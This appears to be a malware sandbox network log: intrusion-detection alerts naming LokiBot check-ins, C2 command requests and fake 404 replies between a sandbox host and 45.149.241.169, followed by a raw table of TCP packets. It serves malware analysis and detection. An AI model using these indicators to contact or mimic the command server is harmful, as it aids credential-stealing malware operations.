                                                          2024-10-03T09:22:15.259916+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104978245.149.241.16980TCP
                                                          2024-10-03T09:22:15.264706+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049782TCP
                                                          2024-10-03T09:22:15.428230+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104978345.149.241.16980TCP
                                                          2024-10-03T09:22:15.428230+02002025381ET MALWARE LokiBot Checkin1192.168.2.104978345.149.241.16980TCP
                                                          2024-10-03T09:22:15.428230+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104978345.149.241.16980TCP
                                                          2024-10-03T09:22:16.293625+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104978345.149.241.16980TCP
                                                          2024-10-03T09:22:16.293625+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104978345.149.241.16980TCP
                                                          2024-10-03T09:22:16.298895+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049783TCP
                                                          2024-10-03T09:22:16.459230+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104978445.149.241.16980TCP
                                                          2024-10-03T09:22:16.459230+02002025381ET MALWARE LokiBot Checkin1192.168.2.104978445.149.241.16980TCP
                                                          2024-10-03T09:22:16.459230+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104978445.149.241.16980TCP
                                                          2024-10-03T09:22:18.382621+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104978445.149.241.16980TCP
                                                          2024-10-03T09:22:18.382621+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104978445.149.241.16980TCP
                                                          2024-10-03T09:22:18.387415+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049784TCP
                                                          2024-10-03T09:22:18.541296+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104978545.149.241.16980TCP
                                                          2024-10-03T09:22:18.541296+02002025381ET MALWARE LokiBot Checkin1192.168.2.104978545.149.241.16980TCP
                                                          2024-10-03T09:22:18.541296+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104978545.149.241.16980TCP
                                                          2024-10-03T09:22:19.163958+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104978545.149.241.16980TCP
                                                          2024-10-03T09:22:19.163958+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104978545.149.241.16980TCP
                                                          2024-10-03T09:22:19.168785+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049785TCP
                                                          2024-10-03T09:22:19.323391+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104978645.149.241.16980TCP
                                                          2024-10-03T09:22:19.323391+02002025381ET MALWARE LokiBot Checkin1192.168.2.104978645.149.241.16980TCP
                                                          2024-10-03T09:22:19.323391+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104978645.149.241.16980TCP
                                                          2024-10-03T09:22:19.984520+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104978645.149.241.16980TCP
                                                          2024-10-03T09:22:19.984520+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104978645.149.241.16980TCP
                                                          2024-10-03T09:22:19.989579+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049786TCP
                                                          2024-10-03T09:22:20.145363+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104978745.149.241.16980TCP
                                                          2024-10-03T09:22:20.145363+02002025381ET MALWARE LokiBot Checkin1192.168.2.104978745.149.241.16980TCP
                                                          2024-10-03T09:22:20.145363+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104978745.149.241.16980TCP
                                                          2024-10-03T09:22:20.837934+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104978745.149.241.16980TCP
                                                          2024-10-03T09:22:20.837934+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104978745.149.241.16980TCP
                                                          2024-10-03T09:22:20.842773+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049787TCP
                                                          2024-10-03T09:22:20.992218+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104978845.149.241.16980TCP
                                                          2024-10-03T09:22:20.992218+02002025381ET MALWARE LokiBot Checkin1192.168.2.104978845.149.241.16980TCP
                                                          2024-10-03T09:22:20.992218+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104978845.149.241.16980TCP
                                                          2024-10-03T09:22:21.745606+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104978845.149.241.16980TCP
                                                          2024-10-03T09:22:21.745606+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104978845.149.241.16980TCP
                                                          2024-10-03T09:22:21.750540+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049788TCP
                                                          2024-10-03T09:22:21.900606+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104978945.149.241.16980TCP
                                                          2024-10-03T09:22:21.900606+02002025381ET MALWARE LokiBot Checkin1192.168.2.104978945.149.241.16980TCP
                                                          2024-10-03T09:22:21.900606+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104978945.149.241.16980TCP
                                                          2024-10-03T09:22:22.564890+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104978945.149.241.16980TCP
                                                          2024-10-03T09:22:22.564890+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104978945.149.241.16980TCP
                                                          2024-10-03T09:22:22.569891+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049789TCP
                                                          2024-10-03T09:22:22.731444+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104979045.149.241.16980TCP
                                                          2024-10-03T09:22:22.731444+02002025381ET MALWARE LokiBot Checkin1192.168.2.104979045.149.241.16980TCP
                                                          2024-10-03T09:22:22.731444+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104979045.149.241.16980TCP
                                                          2024-10-03T09:22:23.426654+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104979045.149.241.16980TCP
                                                          2024-10-03T09:22:23.426654+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104979045.149.241.16980TCP
                                                          2024-10-03T09:22:23.432070+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049790TCP
                                                          2024-10-03T09:22:23.590474+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104979145.149.241.16980TCP
                                                          2024-10-03T09:22:23.590474+02002025381ET MALWARE LokiBot Checkin1192.168.2.104979145.149.241.16980TCP
                                                          2024-10-03T09:22:23.590474+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104979145.149.241.16980TCP
                                                          2024-10-03T09:22:24.372920+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104979145.149.241.16980TCP
                                                          2024-10-03T09:22:24.372920+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104979145.149.241.16980TCP
                                                          2024-10-03T09:22:24.378030+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049791TCP
                                                          2024-10-03T09:22:24.518060+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104979245.149.241.16980TCP
                                                          2024-10-03T09:22:24.518060+02002025381ET MALWARE LokiBot Checkin1192.168.2.104979245.149.241.16980TCP
                                                          2024-10-03T09:22:24.518060+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104979245.149.241.16980TCP
                                                          2024-10-03T09:22:25.207193+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104979245.149.241.16980TCP
                                                          2024-10-03T09:22:25.207193+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104979245.149.241.16980TCP
                                                          2024-10-03T09:22:25.212158+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049792TCP
                                                          2024-10-03T09:22:25.368288+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104979345.149.241.16980TCP
                                                          2024-10-03T09:22:25.368288+02002025381ET MALWARE LokiBot Checkin1192.168.2.104979345.149.241.16980TCP
                                                          2024-10-03T09:22:25.368288+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104979345.149.241.16980TCP
                                                          2024-10-03T09:22:26.051444+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104979345.149.241.16980TCP
                                                          2024-10-03T09:22:26.051444+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104979345.149.241.16980TCP
                                                          2024-10-03T09:22:26.056641+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049793TCP
                                                          2024-10-03T09:22:26.207258+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104979445.149.241.16980TCP
                                                          2024-10-03T09:22:26.207258+02002025381ET MALWARE LokiBot Checkin1192.168.2.104979445.149.241.16980TCP
                                                          2024-10-03T09:22:26.207258+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104979445.149.241.16980TCP
                                                          2024-10-03T09:22:26.870939+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104979445.149.241.16980TCP
                                                          2024-10-03T09:22:26.870939+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104979445.149.241.16980TCP
                                                          2024-10-03T09:22:26.875901+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049794TCP
                                                          2024-10-03T09:22:27.022466+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104979545.149.241.16980TCP
                                                          2024-10-03T09:22:27.022466+02002025381ET MALWARE LokiBot Checkin1192.168.2.104979545.149.241.16980TCP
                                                          2024-10-03T09:22:27.022466+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104979545.149.241.16980TCP
                                                          2024-10-03T09:22:27.946191+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104979545.149.241.16980TCP
                                                          2024-10-03T09:22:27.946191+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104979545.149.241.16980TCP
                                                          2024-10-03T09:22:27.950982+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049795TCP
                                                          2024-10-03T09:22:28.117331+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104979645.149.241.16980TCP
                                                          2024-10-03T09:22:28.117331+02002025381ET MALWARE LokiBot Checkin1192.168.2.104979645.149.241.16980TCP
                                                          2024-10-03T09:22:28.117331+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104979645.149.241.16980TCP
                                                          2024-10-03T09:22:28.768533+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104979645.149.241.16980TCP
                                                          2024-10-03T09:22:28.768533+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104979645.149.241.16980TCP
                                                          2024-10-03T09:22:28.773427+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049796TCP
                                                          2024-10-03T09:22:28.927858+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104979745.149.241.16980TCP
                                                          2024-10-03T09:22:28.927858+02002025381ET MALWARE LokiBot Checkin1192.168.2.104979745.149.241.16980TCP
                                                          2024-10-03T09:22:28.927858+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104979745.149.241.16980TCP
                                                          2024-10-03T09:22:29.580351+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104979745.149.241.16980TCP
                                                          2024-10-03T09:22:29.580351+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104979745.149.241.16980TCP
                                                          2024-10-03T09:22:29.585337+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049797TCP
                                                          2024-10-03T09:22:29.746973+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104979845.149.241.16980TCP
                                                          2024-10-03T09:22:29.746973+02002025381ET MALWARE LokiBot Checkin1192.168.2.104979845.149.241.16980TCP
                                                          2024-10-03T09:22:29.746973+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104979845.149.241.16980TCP
                                                          2024-10-03T09:22:30.494085+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104979845.149.241.16980TCP
                                                          2024-10-03T09:22:30.494085+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104979845.149.241.16980TCP
                                                          2024-10-03T09:22:30.499155+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049798TCP
                                                          2024-10-03T09:22:30.654397+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104979945.149.241.16980TCP
                                                          2024-10-03T09:22:30.654397+02002025381ET MALWARE LokiBot Checkin1192.168.2.104979945.149.241.16980TCP
                                                          2024-10-03T09:22:30.654397+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104979945.149.241.16980TCP
                                                          2024-10-03T09:22:31.469550+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104979945.149.241.16980TCP
                                                          2024-10-03T09:22:31.469550+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104979945.149.241.16980TCP
                                                          2024-10-03T09:22:31.474479+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049799TCP
                                                          2024-10-03T09:22:31.633256+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104980045.149.241.16980TCP
                                                          2024-10-03T09:22:31.633256+02002025381ET MALWARE LokiBot Checkin1192.168.2.104980045.149.241.16980TCP
                                                          2024-10-03T09:22:31.633256+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104980045.149.241.16980TCP
                                                          2024-10-03T09:22:32.287998+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104980045.149.241.16980TCP
                                                          2024-10-03T09:22:32.287998+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104980045.149.241.16980TCP
                                                          2024-10-03T09:22:32.296880+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049800TCP
                                                          2024-10-03T09:22:32.759509+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104980145.149.241.16980TCP
                                                          2024-10-03T09:22:32.759509+02002025381ET MALWARE LokiBot Checkin1192.168.2.104980145.149.241.16980TCP
                                                          2024-10-03T09:22:32.759509+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104980145.149.241.16980TCP
                                                          2024-10-03T09:22:33.477823+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104980145.149.241.16980TCP
                                                          2024-10-03T09:22:33.477823+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104980145.149.241.16980TCP
                                                          2024-10-03T09:22:33.482941+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049801TCP
                                                          2024-10-03T09:22:33.636826+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104980245.149.241.16980TCP
                                                          2024-10-03T09:22:33.636826+02002025381ET MALWARE LokiBot Checkin1192.168.2.104980245.149.241.16980TCP
                                                          2024-10-03T09:22:33.636826+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104980245.149.241.16980TCP
                                                          2024-10-03T09:22:34.400049+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104980245.149.241.16980TCP
                                                          2024-10-03T09:22:34.400049+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104980245.149.241.16980TCP
                                                          2024-10-03T09:22:34.404990+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049802TCP
                                                          2024-10-03T09:22:34.567446+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104980345.149.241.16980TCP
                                                          2024-10-03T09:22:34.567446+02002025381ET MALWARE LokiBot Checkin1192.168.2.104980345.149.241.16980TCP
                                                          2024-10-03T09:22:34.567446+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104980345.149.241.16980TCP
                                                          2024-10-03T09:22:35.266278+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104980345.149.241.16980TCP
                                                          2024-10-03T09:22:35.266278+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104980345.149.241.16980TCP
                                                          2024-10-03T09:22:35.271094+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049803TCP
                                                          2024-10-03T09:22:35.412082+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104980445.149.241.16980TCP
                                                          2024-10-03T09:22:35.412082+02002025381ET MALWARE LokiBot Checkin1192.168.2.104980445.149.241.16980TCP
                                                          2024-10-03T09:22:35.412082+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104980445.149.241.16980TCP
                                                          2024-10-03T09:22:36.047866+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104980445.149.241.16980TCP
                                                          2024-10-03T09:22:36.047866+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104980445.149.241.16980TCP
                                                          2024-10-03T09:22:36.052804+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049804TCP
                                                          2024-10-03T09:22:36.196016+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104980545.149.241.16980TCP
                                                          2024-10-03T09:22:36.196016+02002025381ET MALWARE LokiBot Checkin1192.168.2.104980545.149.241.16980TCP
                                                          2024-10-03T09:22:36.196016+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104980545.149.241.16980TCP
                                                          2024-10-03T09:22:36.840524+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104980545.149.241.16980TCP
                                                          2024-10-03T09:22:36.840524+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104980545.149.241.16980TCP
                                                          2024-10-03T09:22:36.845617+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049805TCP
                                                          2024-10-03T09:22:36.999089+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104980645.149.241.16980TCP
                                                          2024-10-03T09:22:36.999089+02002025381ET MALWARE LokiBot Checkin1192.168.2.104980645.149.241.16980TCP
                                                          2024-10-03T09:22:36.999089+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104980645.149.241.16980TCP
                                                          2024-10-03T09:22:37.716251+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104980645.149.241.16980TCP
                                                          2024-10-03T09:22:37.716251+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104980645.149.241.16980TCP
                                                          2024-10-03T09:22:37.721157+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049806TCP
                                                          2024-10-03T09:22:37.869567+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104980745.149.241.16980TCP
                                                          2024-10-03T09:22:37.869567+02002025381ET MALWARE LokiBot Checkin1192.168.2.104980745.149.241.16980TCP
                                                          2024-10-03T09:22:37.869567+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104980745.149.241.16980TCP
                                                          2024-10-03T09:22:40.207040+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104980745.149.241.16980TCP
                                                          2024-10-03T09:22:40.207040+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104980745.149.241.16980TCP
                                                          2024-10-03T09:22:40.212403+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049807TCP
                                                          2024-10-03T09:22:40.386731+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104980845.149.241.16980TCP
                                                          2024-10-03T09:22:40.386731+02002025381ET MALWARE LokiBot Checkin1192.168.2.104980845.149.241.16980TCP
                                                          2024-10-03T09:22:40.386731+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104980845.149.241.16980TCP
                                                          2024-10-03T09:22:41.026370+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104980845.149.241.16980TCP
                                                          2024-10-03T09:22:41.026370+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104980845.149.241.16980TCP
                                                          2024-10-03T09:22:41.031299+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049808TCP
                                                          2024-10-03T09:22:41.280593+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.104980945.149.241.16980TCP
                                                          2024-10-03T09:22:41.280593+02002025381ET MALWARE LokiBot Checkin1192.168.2.104980945.149.241.16980TCP
                                                          2024-10-03T09:22:41.280593+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.104980945.149.241.16980TCP
                                                          2024-10-03T09:22:41.948130+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.104980945.149.241.16980TCP
                                                          2024-10-03T09:22:41.948130+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.104980945.149.241.16980TCP
                                                          2024-10-03T09:22:41.953121+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1049809TCP
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Oct 3, 2024 09:20:40.854855061 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:40.854902029 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:40.854976892 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:40.866173029 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:40.866197109 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:41.340781927 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:41.340867996 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:41.344105005 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:41.344114065 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:41.344358921 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:41.355087042 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:41.399409056 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:41.651647091 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:41.651695013 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:41.651735067 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:41.651777983 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:41.651796103 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:41.651822090 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:41.651834965 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:41.651875973 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:41.651881933 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:41.652359962 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:41.652376890 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:41.652435064 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:41.652441978 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:41.652487040 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:41.758903980 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:41.758975029 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:41.759001017 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:41.759048939 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:41.759066105 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:41.759087086 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:41.759131908 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:41.759316921 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:41.759360075 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:41.759368896 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:41.759439945 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:41.759480000 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:41.759500980 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:41.759510040 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:41.759567022 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:41.760092020 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:41.805732012 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:41.805785894 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:41.852587938 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:41.881287098 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:41.881351948 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:41.881378889 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:41.881405115 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:41.881452084 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:41.881485939 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:41.881987095 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:41.882011890 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:41.882040977 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:41.882050991 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:41.882057905 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:41.882093906 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:41.882812023 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:41.882869005 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:41.882874966 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:41.883179903 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:41.883203983 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:41.883260012 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:41.883265972 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:41.883317947 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:41.883321047 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:41.930692911 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:41.994486094 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:41.994553089 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:41.994584084 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:41.994616985 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:41.994651079 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:41.994663000 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:41.995210886 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:41.995244980 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:41.995317936 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:41.995325089 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:41.996129990 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:41.996162891 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:41.996191978 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:41.996197939 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:41.996227026 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:41.996484041 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:42.054049015 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:42.054227114 CEST49706443192.168.2.10188.114.97.3
                                                          Oct 3, 2024 09:20:42.055442095 CEST44349706188.114.97.3192.168.2.10
                                                          Oct 3, 2024 09:20:42.055535078 CEST44349706188.114.97.3192.168.2.10
